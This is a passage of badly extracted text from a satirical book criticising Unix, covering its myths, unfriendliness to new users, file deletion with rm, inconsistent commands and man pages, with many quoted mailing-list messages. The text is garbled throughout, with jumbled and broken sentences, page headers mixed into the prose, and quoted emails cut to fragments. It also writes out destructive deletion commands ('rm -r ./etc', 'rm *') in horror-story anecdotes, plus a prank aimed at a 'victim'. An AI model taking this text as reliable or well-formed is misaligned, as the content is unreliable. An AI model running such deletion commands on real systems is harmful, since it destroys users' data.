years over their original schedule. and deployed on MS-DOS machines. I was appalled. Some years ago. finally threw Unix out completely. to see what would best meet their needs. you have to fake it out with structs and unions and things. life’s like that.
To achieve this openness. Hope you don’t have to get any work done in the meantime. are for physical objects like steel beams: they let designers order a part and incorporate it into their design with foreknowledge of how it will perform under real-world conditions. wrote Schilling. Unix has its own collection of myths. simple. It’s the right OS for all purposes. 3. 6. those who aren’t honest presumably get shut down soon enough. It’s small. Can’t decide which standard you want to follow? No problem: now you can follow them all. a new standard for object-oriented user interfaces. yet none of the products are compatible. Sun would will wrap C++ and DOE around Objective-C and NEXTSTEP. . It’s fast and efficient. This notion of standards breaks down when applied to software systems.” “I’m just going to try crack once. Indeed.Unix Myths 13 “standard” being applied to software systems such as Unix. the threat of liability keeps most companies honest. as well as a network of dealers pushing them. then the builder’s lawyers call the beam maker’s lawyers to discuss things like compensatory and punitive damages. Unix Myths Drug users lie to themselves. “Pot won’t make me stupid. Sun Microsystems recently announced that it was joining with NeXT to promulgate OpenStep.” “I can stop anytime that I want to. Real standards. 2. everybody follows these self-designed standards. “If a beam fails in service. It’s documented online. Perhaps you’ve seen them before: 1. you’ll hear these lies.” Apparently. It’s standard. 5.” If you are in the market for drugs. and elegant. 4. What sort of specification does a version of Unix satisfy? POSIX? X/ Open? CORBA? There is so much wiggle room in these standards as to make the idea that a company might have liability for not following them ludicrous to ponder. Shellscripts and pipelines are great way to structure complex problems and systems.
Processes are cheap.14 Unix 7. 12. 8. It invented: • the hierarchical file system • electronic mail • networking and the Internet protocols • remote file access • security/passwords/file protection • finger • uniform treatment of I/O devices. 10. It’s written in a high-level language. It has a productive programming environment. You’ll find most of these myths discussed and debunked in the pages that follow. It’s a modern operating system. . 9. 14. It’s what people are asking for. X and Motif make Unix as user-friendly and simple as the Macintosh. 11. 15. It’s documented. 13. The source code: • is available • is understandable • you buy from your manufacturer actually matches what you are running.
Unix Myths 15 .
.
” says Thompson.2 Welcome. At a minimum. “will usually know what’s wrong. it has neither speedometer. the gracious computer . “The experienced driver. a giant “?” lights up in the center of the dashboard. nor gas gauge. nor any of the other numerous idiot lights which plague the modern driver.” —Anonymous New users of a computer system (and even seasoned ones) require a certain amount of hospitality from that system. Rather. if the driver makes a mistake. Unlike most automobiles. New User! Like Russian Roulette with Six Bullets Loaded Ken Thompson has an automobile which he helped design.
not only were human factors engineers never invited to work on the structure. so much so that they don’t mind sleeping on the floor in rooms with no smoke detectors. Nonetheless builders still marvel at its design. With the explosion of cheap workstations. Unix has entered a new era. No amount of training on DOS or the Mac prepares one for the majestic beauty of cryptic two-letter command names such as cp. it hosted no guests. . We don’t envy these companies their task. central heating. the keyboard of the ASR-33 Teletype. Unlike today’s keyboards.18 Welcome. reliability. are now extremely hard and expensive to retrofit into the structure. New User! When Unix was under construction. Those of us who used early 70s I/O devices suspect the degeneracy stems from the speed. Cryptic Command Names The novice Unix user is always surprised by Unix’s choice of command names. and. that of the delivery platform. and the only force necessary is that needed to close a microswitch. Thus. This change is easy to date: it’s when workstation vendors unbundled their C compilers from their standard software suite to lower prices for nondevelopers. rather than programmers. and ls. and windows that open. most importantly. and take the force necessary to run a small electric generator such as those found on bicycles. their need was never anticipated or planned. rm. Thus. keys on the Teletype (at least in memory) needed to travel over half an inch. the common input/output device in those days. You could break your knuckles touch typing on those beasts. Every visitor was a contractor who was given a hard hat and pointed at some unfinished part of the barracks. The fossil record is a little unclear on the boundaries of this change. like flush toilets. Unix was the research vehicle for university and industrial researchers. Unfortunately. For most of its history. but it mostly occurred in 1990. where the distance keys travel is based on feedback principles. This explains why companies are now trying to write graphical user interfaces to “replace” the need for the shell. it’s only during the past few years that vendors have actually cared about the needs and desires of end users. many standard amenities.
This should be a problem worth solving. Such a vendor might as well stop implementing the POSIX standard while it was at it. They use computers to generate. so engineers designed the QWERTY keyboard to slow them down. remove. then every book describing Unix would no longer apply to its system. we’d probably be typing “copy” and “remove” instead of “cp” and “rm. and file restoration probably runs in the millions of dollars annually. His answer: “I would spell creat with an ‘e. Here’s why: 1. In particular.”1 Proof again that technology limits our choices as often as it expands them. Computer keyboards don’t jam. but we’re still living with QWERTY today. Without this trust. If a vendor replaced rm by. A century ago. After more than two decades. Does misery love company that much? Files die and require reincarnation more often under Unix than under any other operating system. All Unix novices have “accidentally” and irretrievably deleted important files. Even experts and sysadmins “accidentally” delete files. what is the excuse for continuing this tradition? The implacable force of history. The bill for lost time. fast typists were jamming their keyboards. AKA existing code and books. the world will still be living with rm.Accidents Will Happen 19 If Dennis and Ken had a Selectric instead of a Teletype. there is rm. the relationship becomes strained. 1 Ken Thompson was once asked by a reporter what he would have changed about Unix if he had it all to do over again. whose raison d’etre is deleting files. we don’t understand why the Unixcenti are in denial on this point. Unix abuses our trust by steadfastly refusing to protect its clients from dangerous commands. A century from now. say. Accidents Will Happen Users care deeply about their files and data. The Unix file system lacks version numbers. and every shell script that calls rm would also no longer apply. analyze. They trust the computer to safeguard their valuable belongings. and store important information. that most dangerous of commands.’” . lost effort.
2. however. Perhaps it could be stuffed into one of those handy environment variables. back in 1984. such as rm. safer operating systems. the file deletion program cannot determine whether the user typed: % rm * or: % rm file1 file2 file3 . The Unix shell. deleting a file marks the blocks used by that file as “available for use” and moves the directory entry for that file into a special directory of “deleted files. Overwriting happens all the time in Unix. This situation could be alleviated somewhat if the original command line was somehow saved and passed on to the invoked client command. 4..20 Welcome.” Tenex had it back in 1974. New User! Automatic file versioning. Even DOS verifies potentially dangerous commands such as “del *. Some don’t even bother to see if their output file has been created. 3. Most operating systems use the two-step. . expands “*”. even the Macintosh.. the space taken by deleted files is reclaimed. which gives new versions of files new names or numbered extensions. separated “throwing things into the trash” from “emptying the trash. This would prevent new versions of files from overwriting old versions. With other. Unix programmers have a criminally lax attitude toward error reporting and checking. File deletion is forever. these programs are sure to delete their input files when they are finished. would preserve previous versions of files.*”. delete-and-purge idea to return the disk blocks used by files to the operating system. This isn’t rocket science. from doing a sanity check to prevent murder and mayhem. Nevertheless. not its clients. Having the shell expand “*” prevents the client program. Unix has no “undelete” command. Under Unix.” If the disk fills up. Many programs don’t bother to see if all of the bytes in their output file can be written to disk.
folklore. These four problems operate synergistically. A series of exchanges on the Usenet news group alt. but if you want to stick your hand in to get it back. causing needless but predictable and daily file deletion. you might not even get a file named “o” since the shell documentation doesn’t specify if the output file “o” gets created before or after the wildcard expansion takes place. They work—some of the time.computers2 Anybody else ever intend to type: % rm *. The shell may be a programming language. Welcome to the future.computers illustrates our case: Date: Wed. “rm” Is Forever The principles above combine into real-life horror stories.folklore. but it isn’t a very precise one. 10 Jan 90 From: djones@megatest. Better techniques were understood and in widespread use before Unix came along. but plenty of room for it! Actually.Accidents Will Happen 21 DOS and Windows give you something more like a sewage line with a trap than a wastebasket. They’re being lost now with the acceptance of Unix as the world’s “standard” operating system.o And type this by accident: % rm *>o Now you’ve got one new empty file called “o”. 2 Forwarded to UNIX-HATERS by Chris Garrigues. It simply deletes the file. .uucp (Dave Jones) Subject: rm * Newsgroups: alt. at least there are utilities you can buy to do the job.
foo and find you just deleted “*” instead of “*. “A rite of passage”? In no other industry could a manufacturer take such a cavalier attitude toward a faulty product. Consider it a rite of passage. Of course. “But your honor.” “Ladies and gentlemen of the jury. the exploding gas tank was just a rite of passage.folklore. . Unix wasn’t designed to live after the mortal blow of losing its /bin directory. consider following excerpt from the comp. I missed the period./bin. Unix aficionados accept occasional file deletion as normal. The FAQ is a list of Frequently Asked Questions garnered from the reports of the multitudes shooting themselves in the feet.questions is an international bulletin-board where users new to the Unix Gulag ask questions of others who have been there so long that they don’t know of any other world.unix. Once I was removing a file system from my disk which was something like /usr/foo/bin. we will prove that the damage caused by the failure of the safety catch on our 3comp. An intelligent operating system would have given the user a chance to recover (or at least confirm whether he really wanted to render the operating system inoperable). Check with your sysadmin to see if a recent backup copy of your file is available.uucp Subject: Re: rm * Newsgroups: alt. any decent systems administrator should be doing regular backups.questions FAQ:3 6) How do I “undelete” a file? Someday. you are going to accidentally type something like: % rm * ./adm …and so on. But when it came time to do .unix.computers I too have had a similar disaster using rm. 10 Jan 90 15:51 CST From: ram@attcan. For example. System didn’t like that too much.22 Welcome.foo”. New User! Date: Wed./etc % rm -r . I was in / usr/foo and had removed several parts of the system by: % rm -r .
that trying to make Unix friendlier. such as ~/. to replace the rm command with a program that moves the files to be deleted to a special hidden directory. they are right.uchicago. The Delete File command in Emacs doesn’t work this way.” Right. of course. Changing rm’s Behavior Is Not an Option After being bitten by rm a few times. Date: From: To: Subject: Mon. This. “deleting” a file and “rm’ing” it. Keating was just a rite of passage for those retirees.Accidents Will Happen 23 chainsaw was just a rite of passage for its users. we will show that getting bilked of their life savings by Mr. to give it basic amenities. no I can’t.edu> UNIX-HATERS deletion On our system. “rm” doesn’t delete the file. They argue. better yet. will actually make it worse. though not quite in the terms we use. the impulse rises to alias the rm command so that it does an “rm -i” or. These tricks lull innocent users into a false sense of security. . I have to keep two separate concepts in my head. nor does the D command in Dired. is because the undeletion protocol is not part of the operating system’s model of files but simply part of a kludge someone put in a shell command that happens to be called “rm. and remind myself of which of the two of them I am actually performing when my head says to my hands “delete it. rather it renames in some obscure way the file so that something called “undelete” (not “unrm”) can get it back. since of course I can always undelete them. Well. 16 Apr 90 18:46:33 199 Phil Agre <agre@gargoyle. Unfortunately.deleted.” As a result. This has made me somewhat incautious about deleting files.” “May it please the court.” Some Unix experts follow Phil’s argument to its logical absurdity and maintain that it is better not to make commands like rm even a slight bit friendly.
com (Randal L. do an: % alias del rm -i AND DON'T USE RM! Sheesh. Funny thing is. Even stranger. not ones and zeros” discussion… Just another system hacker. Recently. please. New User! Date: Thu. even though millions of dollars of destruction . commands don't operate normally.folklore. which is frustrating as h*ll when you've got this user to help and four other tasks in your “urgent: needs attention NOW” queue. (2) There’s no way to protect from all things that can accidentally remove files.unix.computers We interrupt this newsgroup to bring you the following message… #ifdef SOAPBOX_MODE Please. these are experienced Unix users who should know better. Within 72 hours. (3) If a user asks a sysadm (my current hat that I’m wearing) to assist them at their terminal. a request went out to comp.questions asking sysadmins for their favorite administrator horror stories. Schwartz) Subject: Don’t overload commands! (was Re: rm *) Newsgroups: alt.intel. users can and will get the assumption that “anything is undoable” (definitely not true!). 11 Jan 90 17:17 CST From: merlyn@iwarp. (1) People usually put it into their .cshrc in the wrong place. please do not encourage people to overload standard commands with “safe” commands. so that scripts that want to “rm” a file mysteriously ask for confirmation.24 Welcome. If you want an “rm” that asks you for confirmation. Most of them regarded losing files using methods described in this chapter. people!?! #endif We now return you to your regularly scheduled “I've been hacking so long we had only zeros. 300 messages were posted. and if you protect one common one. How tough can that be. and/or fill up the disk thinking they had really removed the file.
Consistently Inconsistent Predictable commands share option names.edu RISKS-LIST@kl. so the removal of everything stopped early.berkeley. Consistency requires a concentrated effort on the part of some central body that promulgates standards. Applications on the Macintosh are consistent because they follow a guidebook published by Apple. Coincidentally. Unfortunately. The author of this message suggests further hacking the shell (by adding a “nohistclobber option”) to make up for underlying failing of the operating system’s expansion of star-names. most of those very same sysadmins came to Unix’s defense when it was attacked as not being “user-friendly.” Not user friendly? Unix isn’t even “sysadmin friendly”! For example: Date: From: To: Subject: Wed. and to my horror saw the screen echo “rm -r *” I had run in some other directory. Luckily for him. .” I had never bothered writing a safe rm script since I did not remove files by mistake. where possible. 14 Sep 88 01:39 EDT Matthew P Wiener <weemba@garnet. produce similar output. No such body has ever existed for 4 Forwarded to UNIX-HATERS by Michael Travers. having taken time to clean things up. just the other day I listened to a naive user’s horror at running “rm *” to remove the file “*” he had just incorrectly created from within mail. Then one day I had the bad luck of typing “!r” to repeat some command or other from the history list. and. even experienced users can do a lot of damage with “rm.Consistently Inconsistent 25 was reported in those messages. Maybe the C shell could use a nohistclobber option? This remains the only time I have ever rm’ed or overwritten any files by mistake and it was a pure and simple gotcha! of the lowest kind. a file low in alphabetic order did not have write permission. take arguments in roughly the same order. this “fix” is about as effective as repairing a water-damaged wall with a new coat of paint.sri.com4 Re: “Single keystroke” On Unix.
As a result. but slightly different understandings of what a regular expression is). users will graft functionality onto the underlying framework. 04 Mar 89 19:25:58 EST dm@think. What most people might think of as a subroutine. sed. Some read standard input. grep. The real problem of consistency and predictability. In order to be usable by a wide number of people. Unfortunately. some don’t. and the shells all have similar. it did occur to someone. some don’t. the program “cat” which concatenates multiple files to its output6 now has 5 Well. so you could link them into your own program. Some report errors. Date: From: To: Subject: Sat. Too bad it never occurred to anyone to make these commands into real subroutines. . some don’t. suggests Dave Mankins. instead of having to write your own regular expression parser (which is why ed. Some create files world writable.com UNIX-HATERS Unix weenies at their own game Unix weenies like to boast about the conceptual simplicity of each command. some don’t. an operating system must be rich. Some put a space between an option and a filename. since. Unix weenies wrap up as a whole command. some don’t. Unix was an experiment to build an operating system as clean and simple as possible. may be that Unix provided programmers outside AT&T with no intellectual framework for making these additions. one can write pretty powerful programs by linking together these little subroutines. after freshman programmers at Berkeley got through with it. that someone worked on a version of Unix that became an evolutionary dead-end. Purists object that. This isn’t such a bad idea. but as a production system the researchers at AT&T overshot their goal. in the absence of any other interpreters.26 Welcome.5 The highest achievement of the Unix-aesthetic is to have a command that does precisely one function. it worked. with its own argument syntax and options. some don’t. actually. As an experiment. New User! Unix utilities. some utilities take their options preceded by a dash. Some write standard output. and does it well. If the system does not provide that fundamental richness itself.
Finally. and many other operationg systems. Unix filenames can contain most characters.ed. “head” and “tail.” . the program should be calling a library to perform wildcard expansion. (“Cat came back from Berkeley waving flags. not using the program for its “true purpose. and dangerous behavior. Therefore. programs accept their options as their first argument. This is flaw #1. surprising. in the hands of amateurs. This is flaw #2.) This philosophy. including nonprinting ones. yielding unpredictable. By convention. Even though their operations are duals of one another. Options (switches) and other arguments should be separate entities. and be no better or worse than them. These filenames become options to the invoked program.uk (Kees Goossens) Subject: Re: rm * Newsgroups: alt.folklore. In particular. leads to inexplicably mind-numbing botches like the existence of two programs. then Unix would have the same lack of consistency and entropy as other systems that were accreted over time. usually preceded by a dash (–). However. This is flaw #3. Unfortunately. perhaps the ultimate Unix minimalist.” which print the first part or the last part of a file.Consistently Inconsistent 27 OPTIONS. depending. These architectural choices interact badly. programs are not allowed to see the command line that invoked them. filenames that begin with a dash (-) appear first when “*” is used. architectural flaws increase the chaos and surprise factor. Genera. lest they spontaneously combust. “head” and “tail” are different programs. written by different authors. and the dash (-) comes first in the lexicographic caste system. 10 Jan 90 10:40 CST From: kgg@lfcs. that is. The shell lists files alphabetically when expanding “*”. Date: Wed. DOS.ac. the shell acts more like Inspector Clouseau than Florence Nightingale. The shell acts as an intermediary that sanitizes and synthesizes a command line for a program from the user’s typing. and take different options! If only the laws of thermodynamics were operating here. We mentioned that the shell performs wildcard expansion. it replaces the star (*) with a listing of all the files in a directory.” in the words of Rob Pike. as they are on VMS.computers 6 Using “cat” to type files to your terminal is taking advantage of one of its side effects.
28 Welcome, New User!
Then there’s the story of the poor student who happened to have a file called “-r” in his home directory. As he wanted to remove all his non directory files (I presume) he typed: % rm * … automatically. Then we could modify the ls command not to show it.
Impossible Filenames
We’ve known several people who have made a typo while renaming a file that resulted in a filename that began with a dash: % mv file1 -file2 Now just try to name it back: % mv -file2 file1 usage: mv [-if] f1 f2 or mv [-if] f1 ... fn d1 (‘fn’ is a file or directory) % The filename does not cause a problem with other Unix commands because there’s little consistency among Unix commands. For example, the filename “-file2” is kosher to Unix’s “standard text editor,” ed. This example works just fine: % ed -file2 4347
% rm -file usage: rm [-rif] % rm ?file usage: rm [-rif] % rm ????? usage: rm [-rif] % rm *file2 usage: rm [-rif] %
file ... file ... file ... file ...
rm interprets the file’s first character (the dash) as a command-line option; then it complains that the characters “l” and “e” are not valid options. Doesn’t it seem a little crazy that a filename beginning with a hypen, especially when that dash is the result of a wildcard match, is treated as an option list? Unix provides two independent and incompatible hack-arounds for eliminating simply Here’s a way to amuse and delight your friends (courtesy of Leigh Klotz). First, in great secret, do the following: % mkdir foo % touch foo/foo~ Then show your victim the results of these incantations: % ls foo* foo~ % rm foo~ rm: foo~ nonexistent % rm foo* rm: foo directory % ls foo* foo~ % Last, for a really good time, try this: % cat - - (Hint: press ctrl-D three times to get your prompt back!)
Online Documentation commands that live in a shell and therefore have no man pages of their own. A novice told to use “man command” to get the documentation on a command rapidly gets confused as she sees some commands documented, and others not. And if she’s been set up with a shell different from the ones documented in third-party books, there’s no hope of enlightenment without consulting a guru.
Error Messages and Error Checking, NOT!.
To Delete Your File, Try the Compiler
Some versions of cc frequently bite undergraduates by deleting previous output files before checking for obvious input problems. Date: Thu, 26 Nov 1992 16:01:55 GMT From: tk@dcs.ed.ac.uk (Tommy Kelly) Subject: HELP! Newsgroups: cs.questions9: From: To: Date: Subject: Daniel Weise <daniel@dolores.stanford.edu> UNIX-HATERS Thu, 1 July 1993 09:10:50 -0700 tarred and feathered overwrite information. Date: From: To: Subject: Sun, 4 Oct 1992 00:21:49 PDT Pavel Curtis <pavel@parc.xerox.com> UNIX-HATERS So many bastards to choose from…
I have this program, call it foo, that runs continuously on my machine, providing a network service and checkpointing its (massive) executable. executable ". % . These attempts at humor work with the Bourne shell: $ PATH=pretending! /usr/ucb/which sense
36 Welcome, New User!
no sense in pretending! $ drink <bottle; opener bottle: cannot open opener: not found $ mkdir matter; cat >matter matter: cannot create
The Unix Attitude 37
The Unix Attitude
We’ve painted a rather bleak picture: cryptic command names, inconsistent and unpredictable behavior, no protection from dangerous commands, barely acceptable online documentation, and a lax approach to error checking and robustness. Those visiting the House of Unix are not in for a treat. They are visitors to a U.N. relief mission in the third world, not to Disneyland. How did Unix get this way? Part of the answer is historical, as we’ve indicated. But there’s another part to the answer: the culture of those constructing. Date: From: To: Subject: Sun, 24 Dec 89 19:01:36 EST David Chapman <zvona@ai..mit.edu> UNIX-HATERS messages to processes. For example, one message you can send to a process documented,> [1] - Stopped [2] - Stopped [3] + Stopped jobs latex latex latex
This readily lets you associate particular LaTeX jobs with job numbers, .
There simply were no serious Unix users who were not also kernel hackers—or at least had kernel hackers in easy reach. Write your own version. circa 1976 For years.3 Documentation? What Documentation? “One of the advantages of using UNIX to teach an operating systems course is the sources and documentation will easily fit into a student’s briefcase. What documentation was actually written—the infamous Unix “man pages”—was really nothing more than a collection of reminders for people who already knew what they were doing. Call up the program’s author on the phone (or inquire over the network via e-mail). 2. talking about Version 6. Read the source code. handed down as oral wisdom. there were three simple sources for detailed Unix knowledge: 1. 3. Unix was like Homer. .” —John Lions. University of New South Wales. The Unix documentation was so concise that you could read it all in an afternoon.
2. makewhatis. Over the years. the man page system has slowly grown and matured. and finally sent the output through pg or more. a hack like catman isn’t need anymore. To its credit. man was a tiny utility that took the argument that you provided. a system that built a permuted index of the man pages and made it possible to look up a man page without knowing the exact title of the program for which you were looking. advances in electronic publishing have flown past the Unix man system. Indeed. (These utilities are actually shipped disabled with many versions of Unix shipping today. How about indexing on-line documentation? These days you can buy a CD-ROM edition of the Oxford English Dictionary that . it has not become a tangled mass of code and confusing programs like the rest of the operating system.44 Documentation? On-line Documentation The Unix documentation system began as a single program called man. merely print a section called “SEE ALSO” at the bottom of each page and invite the user to type “man something else” on the command line following the prompt. in more than 15 years. Today’s hypertext systems let you jump from article to article in a large database at the click of a mouse button. found the appropriate matching file. in which programmers had the “breakthrough” realization that they could store the man pages as both nroff source files and as files that had already been processed. On the other hand. man pages. catman. But that time has long passed. man was great for its time. With today’s fast processors. Originally. But all those nroff’ed files still take up megabytes of disk space. which makes them deliver a cryptic error when run by the naive user. it hasn’t become significantly more useful either. these tidbits of documentation were called “man pages” because each program’s entry was little more than a page (and frequently less). piped the file through nroff with the “man” macros (a set of text formatting macros used for nothing else on the planet). apropos. so that they would appear faster on the screen. and key (which was eventually incorporated into man -k).) Meanwhile. by contrast. the Unix system for on-line documentation has only undergone two significant advances: 1.
Things got a little confused when AT&T slapped together System V. one of the biggest problems is telling the program where your man pages actually reside on your system. To be fair. who's got the man page? For those of you willing to admit some familiarity with Unix. So when I tried looking for the lockf(3) pages. Today even DOS now has an indexed. Eventually. I tried this on a SGI Indigo yesterday: michael: man lockf . some vendors have been embarassed into writing their own hypertext documentation systems.com> UNIX-HATERS Man page. /usr/man/man3. you know that there are some on-line manual pages in /usr/man. /usr/man/man2. On some systems. / usr/man/manl was moved to /usr/local/man. to find out exactly how non-portable lockf is. Berkeley modified man so that the program would search for its man pages in a set of directories specified by an environment variable called MANPATH. The directory /usr/man/man1 became /usr/man/c_man. are still formatted for the 80-column. often times with man pages that are out-of-date. On those systems. finding documentation was easy: it was all in /usr/man. It was a great idea with just one small problem: it didn’t work. as if a single letter somehow was easier to remember than a single digit. Back in the early days. meanwhile. Then the man pages were split into directories by chapter: /usr/man/man1. 9 Dec 92 13:17:01 -0500 Rainbow Without Eyes <michael@porsche. 66-line page of a DEC printing terminal. and that this is usually a good place to start looking for documentation about a given function.visix. are still indexed solely by the program’s name and one-line description. on the other hand. hypertext system for on-line documentation.On-line Documentation 45 indexes every single word in the entire multivolume set. Many sites even threw in / usr/man/manl for the “local” man pages. Man pages. or simply missing altogether. Date: From: To: Subject: Wed. and so on. Companies that were selling their own Unix applications started putting in their own “man” directories.” For people trying to use man today. man has become an evolutionary deadend. man page. “I Know It’s Here … Somewhere. man pages.
there’s something wrong with finding only an X subdirectory in man3.. BSD ls-formatting difference. so I started looking in /usr/man.. But. and that my MANPATH already contained /usr/man (and every other directory in which I had found useful man pages on any system)./u_man . other than the SysV vs. This is despite the fact that I know that things can be elsewhere. looking for anything that looked like cat3 or man3: michael: cd michael: ls kermit.46 Documentation? Nothing showed up. I thought this was rather weird.3 -print michael: ../p_man/man3 Now. I expected to see something like: michael: cd /usr/man michael: ls man1 man2 man3 man4 man8 manl What I got was: michael: cd /usr/man michael: ls local p_man u_man (%*&@#+! SysV-ism) Now.1c michael: cd michael: ls man3 michael: cd man1 man4 michael: cd michael: ls Xm local man5 man6 man7 ./p_man . I kept on. What next? The brute-force method: michael: cd / michael: find / -name lockf.
but he gets it when he types “man lockf. and see a directory named “standard” at the top of my xterm../p_man/cat3 michael: ls I luck out. He replies that he doesn't know where the man page is. michael: cd . There’s no lockf. Better to just ls a few files instead: michael: ls lock* No match.” The elements of his MANPATH are less than helpful.On-line Documentation 47 Waitaminit. michael: cd /usr/catman michael: ls a_man g_man local p_man u_man whatis System V default format sucks./.. due to rampant SysV-ism of / bin/ls. as his MANPATH is a subset of mine.. which the files have again scrolled off the screen… . What the hell is going on? michael: ls -d */cat3 g_man/cat3 p_man/cat3 michael: cd g_man/cat3 michael: ls standard michael: cd standard michael: ls Bingo! The files scroll off the screen./..3 man page on system? Time to try going around the problem: send mail to a regular user of the machine.
michael: cd standard michael: ls lock* lockf. can keep in your head anyway. and not stored as plain text? Did SGI think that the space they would save by compressing the man pages would make up for the enormous RISC binaries that they have lying around? Anyhow. michael: cp lockf. So I edit my . goody. cd . add more entries.Z: No such file or directory Sigh. It starts to break down as the number of entries in the system approaches a thousand. It’s compress(1)ed. sure enough. might as well read it while I’m here. The least they could do is make it easily people-readable. No Manual Entry for “Well Thought-Out” The Unix approach to on-line documentation works fine if you are interested in documenting a few hundred programs and commands that you.z Oh.cshrc to add /usr/catman to already-huge MANPATH and try again: michael: source .z. Date: From: To: Subject: Thu.z lockf. 20 Dec 90 3:20:13 EST Rob Austein <sra@lcs.48 Documentation? michael: ls lock* No match. for the most part. itching brain shakes with spasms and strange convulsions. zcat lockf | more lockf. and non-portable as the rest of Unix.Z: No such file or directory michael: zcat lockf. Why is it compressed.edu> UNIX-HATERS Don’t call your program “local” if you intend to document it .cshrc michael: man lockf And.z ~/lockf.Z: not in compressed format It’s not compress(1)ed? Growl.Z.mit. it’s there. michael: zcat lockf lockf. and the swelling. I forget exactly how inflexible zcat is. written by hundreds of authors spread over the continent.
after all. After all. Should built-ins be documented on their own man pages or on the man page for the shell? Traditionally. looking at the man page for sh or csh isn’t cheating. That’s because “history” is a built-in shell command. have built-in commands. To find out more about the “history” command.com> UNIX-HATERS consistency is too much of a drag for Unix weenies I recently had to help a frustrated Unix newbie with these gems: . an aspiring novice might try: % man history No manual entry for history. a user might hear that Unix has a “history” feature which saves them the trouble of having to retype a command that they have previously typed. even if you explicitly specify the manual section number (great organizational scheme. but different functions. these programs have been documented on the shell page.) Of course. There are many of them. since there is no while or if or set command.” If you try. you get the following message: sra@mintaka> man 8 local But what do you want from section local? Shell Documentation The Unix shells have always presented a problem for Unix documentation writers: The shells. perhaps it is better that each shell’s built-ins are documented on the page of the shell. 24 Sep 92 16:25:49 -0400 Systems Anarchist <clennox@ftp. (Go ahead.On-line Documentation 49 It turns out that there is no way to obtain a manual page for a program called “local. Such a man page would probably consist of a single line: “But which set command do you want?” Date: From: To: Subject: Thu. Try to find a complete list. this attitude causes problems for new users—the very people for whom documentation should be written. rather than their own page. Imagine trying to write a “man page” for the set command. huh?). different shells have commands that have the same names. That these commands look like real commands is an illusion. Unfortunately. For example. This approach is logically consistent.
stanford.mit. conflicting. David. He had never seen it documented anywhere. and sometimes neither. When David Chapman. Under the c-shell (the other ‘standard’ Unix shell). the set command sets option switches. 7 May 90 18:44:06 EST Robert E. but definitely no clue that another. a leading authority in the field of artificial intelligence.edu UNIX-HATERS Why don’t you just type “fg %emacs” or simply “%emacs”? Come on. Seastrom <rs@eddie.slb. you don’t have to go inventing imaginary lossage to complain about! <grin> The pitiful thing was that David didn’t know that you could simply type “%emacs” to restart a suspended Emacs job. David Chapman wasn’t the only one. there is so much lossage in Unix. ‘set’ sets shell variables.mit.’ you will get either one or the other definition of the command (depending on the whim of the vendor of that particular Unix system) but usually not both. Seastrom <rs@eddie. Mistakenly using the ‘set’ syntax for one shell under the other silently fails.edu> zvona@gang-of-four.com> Robert E. If you do a ‘man set. To top it off.50 Documentation? Under the Bourne shell (the ‘standard’ Unix shell). either. without any error or warning whatsoever. Robert Seastrom sent this helpful message to David and cc’ed the list: Date: From: To: Cc: Mon. (Most of the people who read early drafts of this book didn’t know either!) Chris Garrigues was angrier than most: Date: From: To: Cc: Subject: Tue. typing ‘set’ under the Bourne shell lists the shell variables! Craig Undocumented shell built-ins aren’t just a mystery for novice.edu> UNIX-HATERS Re: today’s gripe: fg %3 . 8 May 90 11:43 CDT Chris Garrigues <7thSon@slcs. complained to UNIX-HATERS that he was having a hard time using the Unix fg command because he couldn’t remember the “job numbers” used by the C-shell. definition exists. many people on UNIX-HATERS sent in e-mail saying that they didn’t know about these funky job-control features of the C-shell either.
henr@Xerox.This Is Internal Documentation? 51 Is this documented somewhere or do I have to buy a source license and learn to read C? “man fg” gets me the CSH_BUILTINS man page[s]. I know that this is functionality that I will use far more often than I will want to refer to a job by name. This is major league. If I search this man page for “job” it doesn’t tell me this anywhere. More importantly. take the following for example: toolsun% mail . Date: From: To: Subject: 3 Jan 89 16:26:25 EST (Tuesday) Reverend Heiny <Heiny. but it’s true. For many programs. Big time Hooverism. Sucks with a capital S. Unfortunately. the “on-line” docs are in the form of a cryptic one-line “usage” statement. This Is Internal Documentation? Some of the larger Unix utilities provide their own on-line documentation as well. Unix sucks.COM> UNIX-HATERS A conspiracy uncovered After several hours of dedicated research. and I’ve never been able to find anything useful in there. tell me that if I type “% job &” that I can take a job out of the background and put it back in the background again. I mean. you can’t always rely on the documentation matching the program you are running. however. this may come as a surprise to some of you. Now. This research has been validated by independent researchers around the world. Here is the “usage” line for awk: % awk awk: Usage: awk [-f source | 'cmds'] [files] Informative. this is no two-bit suckiness we are talking here. huh? More complicated programs have more in-depth on-line docs. I have reached an important conclusion. It does.
com> UNIX-HATERS no comments needed fs2# add_client usage: add_client [options] clients add_client -i|-p [options] [clients] -i interactive mode . like a few others we’ve mentioned in this chapter. 1992 7:47PM Mark Lottor <mkl@nw. his bug seems to be fixed now.invoke full-screen mode [other options deleted for clarity] fs2# add_client -i Interactive mode uses no command line arguments How to Get Real Documentation Actually. Or perhaps it just moved to a different application. you are much better off using strings than man: next% man cpp No manual entry for cpp. vote. especially one that is old enough to drive. next% strings /lib/cpp | grep / . undocumented options. September 29. and so forth. you can get a complete list of the program’s hard-coded file name.52 Documentation? Mail version SMI 4. Using strings. and drink 3. the best form of Unix documentation is frequently running the strings command over a program’s object code.0 Sat Apr 9 01:54:23 PDT "/usr/spool/mail/chris": 3 messages 3 new >N 1 chris Thu Dec 22 15:49 19/643 editor N 2 root Tue Jan 3 10:35 19/636 editor N 3 chris Tue Jan 3 14:40 19/656 editor & ? Unknown command: "?" & 1988 Type ? for help. For example. environment variables.2 beers. obscure error messages. saved “trash1” saved “trash1” saved “/tmp/ma8” What production environment. should reject the very commands that it tells you to enter? Why does the user guide bear no relationship to reality? Why do the commands have cryptic names that have no bearing on their function? We don’t know what Heiny’s problem was. if you want to find out where the cpp program searches for #include files. Date: From: To: Subject: Tuesday.
the real function of Unix’s “man” pages was as a place to collect bug reports. programmers.a posixcrt0. Traps. For many of these developers. The notion that Unix documentation is for naive. Not Users 53 /lib/cpp /lib/ /usr/local/lib/ /cpp next% Hmm… Excuse us for one second: % ls /lib cpp* gcrt0. for the most part. bugs. For Programmers. and system administrators is a recent . and potential pitfalls were documented more frequently than features because the people who read the documents were.a cpp-precomp* i386/ m68k/ crt0. the people who were developing the system. or merely inexpert users.0CompatibleHeaders %s/%s /lib/%s/specs next% Silly us. standards for documentation that were prevalent in the rest of the computer industry didn’t apply.o libsys_p. When the documentation framework was laid down. NEXTSTEP’s /lib/cpp calls /lib/cpp-precomp.o libsys_s.For Programmers. You won’t find that documented on the man page either: next% man cpp-precomp No manual entry for cpp-precomp. Not Users Don’t blame Ken and Dennis for the sorry state of Unix documentation today.
